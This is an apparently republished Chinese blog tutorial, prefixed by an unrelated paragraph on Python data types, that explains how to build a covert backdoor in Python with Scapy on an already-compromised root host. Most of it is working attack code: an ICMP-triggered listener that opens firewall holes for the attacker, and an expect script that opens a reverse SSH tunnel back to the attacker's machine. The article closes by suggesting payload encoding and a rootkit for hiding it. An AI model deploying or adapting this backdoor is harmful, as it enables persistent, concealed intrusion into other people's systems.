溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

怎么用Python編寫一個簡單的CS架構(gòu)后門

發(fā)布時間:2021-04-25 10:46:46 來源:億速云 閱讀:332 作者:小新 欄目:開發(fā)技術(shù)

這篇文章給大家分享的是有關(guān)怎么用Python編寫一個簡單的CS架構(gòu)后門的內(nèi)容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

python的數(shù)據(jù)類型有哪些?

python的數(shù)據(jù)類型:1. 數(shù)字類型,包括int(整型)、long(長整型)和float(浮點型)。2.字符串,分別是str類型和unicode類型。3.布爾型,Python布爾類型也是用于邏輯運算,有兩個值:True(真)和False(假)。4.列表,列表是Python中使用最頻繁的數(shù)據(jù)類型,集合中可以放任何數(shù)據(jù)類型。5. 元組,元組用”()”標(biāo)識,內(nèi)部元素用逗號隔開。6. 字典,字典是一種鍵值對的集合。7. 集合,集合是一個無序的、不重復(fù)的數(shù)據(jù)組合。

0x00:事先說明

  • 你已經(jīng)攻陷了對方主機(jī)且獲得了最高權(quán)限。

  • 對方的本地防火墻會丟棄所有的外來數(shù)據(jù)包。

  • 這個后門不會僅綁定在某一個端口上。

  • 這段代碼很容易寫,畢竟是 Python(準(zhǔn)確說是 Python 2.x)。

0x01:工作原理

怎么用Python編寫一個簡單的CS架構(gòu)后門

如你所見,客戶端將偽造具有 ICMP 負(fù)載的特定數(shù)據(jù)包,另一方面在服務(wù)端,也就是我們的被攻擊主機(jī),將會接受我們發(fā)送的數(shù)據(jù)包,即使它開啟了本地的防火墻(丟棄所有外來數(shù)據(jù)包)。關(guān)鍵在于無線網(wǎng)卡的監(jiān)聽模式,它無需和 AP 建立連接卻可以和接受所有流經(jīng)空氣的數(shù)據(jù)包。

我們會用到一個有用的第三方包 Scapy。這是它的官方文檔。如果你是第一次使用,不妨參考這篇文章,也許會有幫助。

0x02:客戶端代碼

'''
客戶端代碼。將服務(wù)端的 IP 地址、客戶端的 IP 地址、客戶端的連接端口,以及連接所需密碼作為程序輸入。如果成功返回一個交互式后門,在代碼硬編碼好的位置寫入日志文件信息。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import os
import os.path
import sys
import time
logging.getLongger("scapy.runtime").setLevel(loggin.ERROR)
file_result = "/tmp/done"
if len(sys.argv) != 5:
 print "usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + “ PASSWORD_CLIENT ”
 sys.exit(1)
server = sys.argv[1]
if os.path.isfile(file_result):
 os.remove(file_result)
load = sys.argv[2] + "|" + sys.argv[3] + "|" + sys.argv[4]
pingr = IP(dst = server) / ICMP() / load
send(pingr, verbose = 0) # send() 函數(shù)工作在協(xié)議棧的第三層(網(wǎng)絡(luò)層)

0x04:服務(wù)端代碼

服務(wù)端代碼分為兩塊:1. 主要腳本部分、2. ssh 隧道部分。

'''
服務(wù)端代碼之主要腳本部分。這個腳本會監(jiān)聽 ICMP 數(shù)據(jù)包并從句法上分析其攜帶的數(shù)據(jù)部分(客戶端 IP 地址、客戶端連接端口、連接所需密碼)。接著在本地打開兩個新的防火墻規(guī)則。最后調(diào)用另一個 expect 腳本,以建立和客戶端之間穩(wěn)定的 ssh 連接。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import re
import subprocess # py2.4 新增模塊,允許用戶編寫代碼生成新進(jìn)程,連接到它們的 input/output/error 管道,并獲取它們的返回/狀態(tài)碼。
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def icmp_monitor_callback(pkt):
 reg = re.compile("(.*)\|(.*)\|(.*)")
 g = reg.match(pkt.load)
 if g:
 subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT'])
 subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT'])
 p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)])
 return
sniff(prn=icmp_monitor_callback, filter="icmp", store=0) # scapy.sniff() 函數(shù)會嗅探來自空氣中的數(shù)據(jù)包,prn 參數(shù)用來指定回調(diào)函數(shù),每當(dāng)符合 filter 的報文被探測到時,就會執(zhí)行回調(diào)函數(shù)。有關(guān)該函數(shù)的詳細(xì)信息,可以參考這篇博客:https://thepacketgeek.com/scapy-sniffing-with-custom-actions-part-1/
'''
服務(wù)端代碼之 ssh 隧道部分,實際上是一個簡單的 expect 腳本。接受嗅探到的客戶端 IP 地址、客戶端端口,以及用于連接的密碼作為輸入。
'''
#!/usr/bin/expect -f
set ip [lindex $argv 0];
set port [lindex $argv 1];
set password [lindex $argv 2];
spawn ssh -o StrictHostKeyChecking=no -R 19999:localhost:$port $ip
expect "*?assword:*"
send "$password\r"
expect "*#"
send "touch /tmp/done\r"
interact

0x05:文末思考

上面完成的后門代碼待完善的地方。

  • ICMP payload 應(yīng)該被編碼。

  • 添加其他的協(xié)議用來喚醒該后門(如 http、特定的 syn 包、dns 等)。

  • 寫一個 rootkit,隱藏該后門,猥瑣欲為。此乃后話。

感謝各位的閱讀!關(guān)于“怎么用Python編寫一個簡單的CS架構(gòu)后門”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI